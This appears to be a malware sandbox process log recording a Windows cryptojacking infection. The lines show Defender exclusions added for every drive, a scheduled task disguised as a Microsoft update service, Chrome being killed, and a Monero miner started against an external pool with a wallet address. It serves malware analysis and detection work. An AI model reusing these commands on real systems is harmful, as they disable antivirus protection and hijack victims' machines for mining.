Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im chrome.exe | |
Source: C:\Windows\System32\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title | |
Source: C:\Users\Public\WindowsUpdate\mservice.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im chrome.exe | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title | Jump to behavior |